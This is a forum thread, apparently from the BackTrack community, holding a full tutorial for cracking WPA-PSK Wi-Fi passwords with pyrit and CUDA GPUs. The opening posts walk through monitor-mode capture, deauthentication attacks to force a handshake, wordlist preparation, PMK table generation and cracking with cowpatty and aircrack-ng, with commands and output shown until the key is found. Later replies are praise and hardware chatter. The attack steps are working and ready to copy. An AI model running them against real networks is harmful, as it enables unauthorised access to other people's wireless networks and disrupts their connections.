Page 1 of 16 12311 ... LastLast
Results 1 to 10 of 156

Thread: pyrit CUDA nvidia Tutorial + Nvidia overclock instructions

  1. #1
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default pyrit CUDA nvidia Tutorial + Nvidia overclock instructions

    OK so here we are with fresh new release and people lets be honest we want to see some thing new. Well this is one of bt4's new exiting features.

    WPA hash Table Generation using CUDA/nvida GPU power.

    First thing to do is check if your card is supported for this technology http://en.wikipedia.org/wiki/CUDA#Supported_GPUs

    So lets get started....

    I'm going to try to assume that if your reading this you have no clue what your doing so I will try to go from A -Z on this.

    So lets boot our disk and when we get to the framebuffer console prompt (thats before you startx) we are going to install the nvidia kernel module.
    Code:
    root@bt:~# cd /opt/cuda/
    root@bt:/opt/cuda# ls
    CUDA_INSTALL  cuda-set-env.sh  nv_20090130-1_i386.deb
    root@bt:/opt/cuda# bash CUDA_INSTALL
    You will get some output and then you will be asked to overwrite your current xorg.conf. Take the default here which is no.
    next lets install the driver
    Code:
    root@bt:~# modprobe nvidia
    root@bt:~# depmod -a
    ok so thats done. Now since we've totally borked our xorg.conf we should generate a new one.
    Code:
    root@bt:~# X -configure
    That will save the new one in /root and we will have to copy it over by hand
    Code:
    root@bt:~# cp xorg.conf.new  /etc/X11/xorg.conf
    At this point we should be able to either startx or use the new bt4-crystal window manager. (shameless plug for me and j0rgan here)

    OK so if every thing went well your are looking at your desktop.

    Now before we get to cracking pyrit has a benchmark utility we can use to see if we are good to go.
    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py benchmark
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    The ESSID-blobspace seems to be empty; you should create an ESSID...
    Available cores: 'Standard CPU', 'Nvidia CUDA'
    Testing CPU-only core 'Standard CPU' (4 CPUs)...  1294.58 PMKs/s
    
    Testing GPU core 'Nvidia CUDA' (Device 'GeForce 8800 GT')...  5409.43 PMKs/s
    As you can see my 8800gt is roughly 5 times faster that my Q6600 quad core chip running at 3.6 GHz

    OK swell, so that works. Now what we need is a .cap file. I'm assuming every one can do this but I will show it anyway.
    Code:
    root@bt:~# ifconfig wlan0 up
    root@bt:~# airmon-ng start wlan0
    root@bt:~#airodump-ng -w cudacapture mon0
    ok so lets do a little scan of my house.


    As you can see I have 2 dd-wrt routers on at the moment and my wife is connected to ddwrt1 feeding her new facebook addiction.
    Lets deauth her a$$
    Code:
    root@bt:~# aireplay-ng -0 10 -a 00:1d:7e:f0:a5:8f -c 00:13:02:a7:dd:53 mon0
    01:13:28  Waiting for beacon frame (BSSID: 00:1D:7E:F0:A5:8F) on channel 6
    01:13:29  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [25|68 ACKs]
    01:13:30  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 3|63 ACKs]
    01:13:31  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
    01:13:32  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
    01:13:33  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|63 ACKs]
    01:13:34  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
    01:13:35  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
    01:13:36  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 5|64 ACKs]
    01:13:37  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [11|64 ACKs]
    01:13:38  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
    Now lets check for success
    Code:
    root@bt:~# aircrack-ng cudacapture-01.cap
    Opening cudacapture-01.cap
    Read 5612 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  00:1D:7E:F0:A5:8F  ddwrt1                    WPA (1 handshake)
       2  00:1D:7E:64:9A:7C  ddwrt2                    WPA (0 handshake)
       3  00:21:29:84:11:FD  CookNet                   WEP (34 IVs)
       4  00:0C:41:3E:2D:66  linksys                   None (192.168.1.1)
       5  00:12:0E:7B:02:78  WEST7359                  No data - WEP or WPA
       6  00:1A:70:83:B0:1C  linksys                   None (0.0.0.0)
       7  00:13:46:44:A5:CE  default                   WEP (11 IVs)
       8  00:14:6C:F6:36:78  CBC                       None (0.0.0.0)
       9  00:06:25:DB:3E:7B  linksys                   None (0.0.0.0)
      10  00:1B:2F:63:7C:50  PawsWithPurpose           No data - WEP or WPA
      11  00:21:29:9A:E6:3C  Bigfoot                   No data - WEP or WPA
      12  00:1C:10:89:16:76  linksys                   None (0.0.0.0)
    
    Index number of target network ?
    Looks like we got one.
    I'm going to start a new post for part 2

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default pyrit CUDA nvidia Tutorial part 2

    Okay so we got a hand shake now what?

    First off we need to grab a dictionary file.
    Code:
    root@bt:~# wget http://www.outpost9.com/files/wordlists/dic-0294.zip
    --2009-02-11 01:17:53--  http://www.outpost9.com/files/wordlists/dic-0294.zip
    Resolving www.outpost9.com... 12.180.200.208
    Connecting to www.outpost9.com|12.180.200.208|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 3283473 (3.1M) [application/zip]
    Saving to: `dic-0294.zip'
    
    100%[=============================================================================================================>] 3,283,473    268K/s   in 9.2
    root@bt:~# unzip dic-0294.zip 
    Archive:  dic-0294.zip          
      inflating: dic-0294.txt
    Then we need to strip out the stuff we dont need.
    Code:
    root@bt:~# cat dic-0294.txt | sort | uniq | pw-inspector -m 8 -M 63 > wpa.lst
    root@bt:~# wc -l wpa.lst 
    597532 wpa.lst
    So about six hundred thousand words.

    Now we got a file to work with. Now for the fun part.
    Code:
    root@bt:~# cd /pentest/password/pyrit/
    root@bt:/pentest/password/pyrit#
    Add our essid

    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 create_essid
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    Created ESSID 'ddwrt1'
    Import our new wpa list

    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py -f /root/wpa.lst import_passwords
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    Importing from  '/root/wpa.lst'
    597532 lines read. All done.
    And start the table generation

    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py batchprocess
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    Using default core 'Nvidia CUDA' (Device 'GeForce 8800 GT')
    Working on ESSID 'ddwrt1'
    Reading unit '1ec5841a057928e33972489b461cb914' (54072 passwords buffered)  
     All done, computed 54072 PMKs in 10.47 seconds, 5164.13 PMKs/s)
    Reading unit '6c9303c848ed6a4473221229d4387934' (54996 passwords buffered)  
     All done, computed 54996 PMKs in 10.79 seconds, 5099.30 PMKs/s)
    Reading unit '70ded804144475dbc58b982625483821' (56076 passwords buffered)  
     All done, computed 56076 PMKs in 10.74 seconds, 5223.29 PMKs/s)...
    
    ...Reading unit 'f384ca460307a079503db313ece6806e' (53808 passwords buffered)  
     All done, computed 53808 PMKs in 10.67 seconds, 5044.67 PMKs/s)
    Reading unit '1bf464713cab79da5efc8503e8f28812' (17496 passwords buffered) 
     All done, computed 17496 PMKs in 3.23 seconds, 5422.30 PMKs/s)
    
    Batchprocessing done.
    So if everything went well you are at this point. Pyrit has the ability to output to cowpatty or airolib-ng files. For the sake of this tutorial I will be using cowpatty because I've found its faster.

    So lets make our cowpatty file
    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f cow.out export_cowpatty
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    Exporting to 'cow.out'...
    4656218 entries written. All done.
    Okay so lets see how fast this will go.
    Code:
    root@bt:~# cd /pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty/
    root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ls
    AUTHORS    COPYING     cowpatty.h  eap-test.dump  fpga.c  genpmk.c  Makefile  md5.o       sha1.c  TODO     utils.o
    CHANGELOG  cowpatty    cowpatty.o  FAQ            fpga.o  genpmk.o  md5.c     radiotap.h  sha1.h  utils.c  wpa2psk-linksys.dump
    common.h   cowpatty.c  dict        file_magic     genpmk  INSTALL   md5.h     README      sha1.o  utils.h  wpapsk-linksys.dump
    root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty
    cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
    cowpatty: Must supply a list of passphrases in a file with -f or a hash file
              with -d.  Use "-f -" to accept words on stdin.
    
    Usage: cowpatty [options]
    
            -f      Dictionary file
            -d      Hash file (genpmk)
            -r      Packet capture file
            -s      Network SSID (enclose in quotes if SSID includes spaces)
            -F card Use FPGA acceleration
            -h      Print this help information and exit
            -v      Print verbose information (more -v for more verbosity)
            -V      Print program version and exit
    
    root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -d /pentest/password/pyrit/cow.out -s ddwrt2 -r /root/cudacapture-01.cap
    cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
    
    Collected all necessary data to mount crack against WPA2/PSK passphrase.
    Starting dictionary attack.  Please be patient.
    key no. 1000: Mathboldit1
    key no. 2000: llegando2
    key no. 3000: shougakukan123
    key no. 4000: DISGUISING
    key no. 5000: Graffaloy
    key no. 6000: Passibleness123
    key no. 7000: Unmaking2
    key no. 8000: Procanal123
    So this is the cracking proccess.......

    Code:
    [4656217 passphrases tested in 24.84 seconds:  187468.86 passphrases/second
    root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty#
    And Just to show you what it would be like with out the hash file..

    Code:
    root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -f /root/wpa.lst -s ddwrt2 -r /root/cudacapture-01.cap
    
    27824 passphrases tested in 84.98 seconds:  327.40 passphrases/second
    Thats a HUGE difference

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default pyrit CUDA nvidia Tutorial part 3

    So you would rather use rather use the airolib-ng option because you love aircrack. That can be done as well like this..

    Back up to right before we created the cow.out table and use these commands instead.

    create the database (pyrit wont do it for you for some reason)
    Code:
    [root@bt:/pentest/password/pyrit# airolib-ng testdb -import essid ddwrt1 
    Database <testdb> does not already exist, creating it...
    Database <testdb> sucessfully created
    Could not open file/stream for reading.
    Then output to our newly created database.

    Code:
    [root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f testdb export_hashdb
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    Exporting ESSID 'ddwrt1'
    Okay.. this takes a little longer than the cowpatty tables due to sql stuff but the advantage to airolib-ng is it can use HUGE files while I think cowpatty fails with hash files over 2 gigs.

    Once its done we can use aircrack
    Code:
    root@bt:/pentest/password/pyrit# aircrack-ng -r testdb /root/cudacapture-01.cap 
    Opening /root/cudacapture-01.cap
    Read 10561 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  00:1D:7E:F0:A5:8F  ddwrt1                    WPA (1 handshake)
       2  00:1D:7E:64:9A:7C  ddwrt2                    WPA (0 handshake)
       3  00:21:29:84:11:FD  CookNet                   WEP (93 IVs)
       4  00:0C:41:3E:2D:66  linksys                   None (192.168.1.1)
       5  00:12:0E:7B:02:78  WEST7359                  No data - WEP or WPA
       6  00:1A:70:83:B0:1C  linksys                   None (192.168.1.1)
       7  00:13:46:44:A5:CE  default                   WEP (28 IVs)
       8  00:14:6C:F6:36:78  CBC                       None (0.0.0.0)
       9  00:06:25:DB:3E:7B  linksys                   None (0.0.0.0)
      10  00:1B:2F:63:7C:50  PawsWithPurpose           No data - WEP or WPA
      11  00:21:29:9A:E6:3C  Bigfoot                   No data - WEP or WPA
      12  00:1C:10:89:16:76  linksys                   None (0.0.0.0)
      13  00:18:3A:3A:B2:B5                            No data - WEP or WPA
      14  00:12:0E:6E:FE:6B  WEST3306                  No data - WEP or WPA
    
    Index number of target network ? 1
    Select the network and let her rip

    Code:
                                     Aircrack-ng 1.0 rc2 r1385
    
    
                       [00:00:38] 4315315 keys tested (112595.70 k/s)
    
    
                              KEY FOUND! [ metasploit ]
    
    
          Master Key     : F4 AB C6 2A 18 F8 89 9B 6A 70 3D 5F EB 0D F4 F9 
                           F8 F8 51 48 25 3E C3 61 EA 54 17 3D D3 84 18 AC 
    
          Transient Key  : 11 A0 36 8F 96 63 64 7F 63 A1 08 35 73 82 96 AE 
                           49 E1 BE 68 F7 7E 8D 98 57 28 C2 E1 DE AC F2 AC 
                           68 00 43 B9 88 8E 96 57 7A BF E2 62 DB DE 6A 1B 
                           BF 53 10 26 D1 D8 32 47 BC A6 F5 86 F1 83 23 11 
    
          EAPOL HMAC     : 68 AE A8 82 57 7C 3D 89 6E BC BD C1 46 8E 34 AD 
    
    
    Quitting aircrack-ng...
    Well Thats IT! Thanks for Listening/Reading

  4. #4
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Beautiful! Thank you for the write up, this is one of the features that I really hoped would be incorporated into BT4.
    -Monkeys are like nature's humans.

  5. #5
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default

    Dude, that's cool. Now figure out how to use all your nvidia cards in your SuperAwesomeSuperComputer at the same time.
    Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69

  6. #6
    Member
    Join Date
    Jun 2008
    Posts
    101

    Default

    Wonderful starting point for BT4 Beta!! Shame on me for not having an Nvida Card to test it out. I used to get 10,000 k/s with a pre-hashed airolib database, what you are getting is just insane.
    QuadCore AMD Phenon X4 9950, 2600 MHz
    8GB DDR2 800MHz
    Dual Boot System: Windows Server 2008 x64 w/ Hyper-V, Ubuntu 9.10 x64

  7. #7
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default

    Quote Originally Posted by adri_ht_ View Post
    Wonderful starting point for BT4 Beta!! Shame on me for not having an Nvida Card to test it out. I used to get 10,000 k/s with a pre-hashed airolib database, what you are getting is just insane.
    Heh, I don't even have a computer that's compatible(or new enough) with the nvidia cards that work with pyrit.....
    Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69

  8. #8
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159

    Default

    Quote Originally Posted by pureh@te View Post
    Lets deauth her a$$
    ...My favorite quote from your tutorial.

    Thanks for posting this. Yes, it is time to upgrade my hardware to something that takes advantage of the GPU power. I'd like to see follow-up posts from other members with GTX-200 series cards. Those numbers should be off the charts.

  9. #9
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    7

    Default

    Does this mean if my MB has a built in ATI graphic it will not work? I do have a nvidia 6600 serires card lying around, will it work?

  10. #10
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    The onboard card shouldnt matter. If you have a nvidia card in the pci slot it should get detected. Some of the newer nvidia stuff doesn't even have vga outs, its only for computuing.

    Like this one I'm saving up for...

    http://www.nvidia.com/object/product..._c1060_us.html


    You can check for your card here

    http://en.wikipedia.org/wiki/CUDA#Supported_GPUs

Page 1 of 16 12311 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •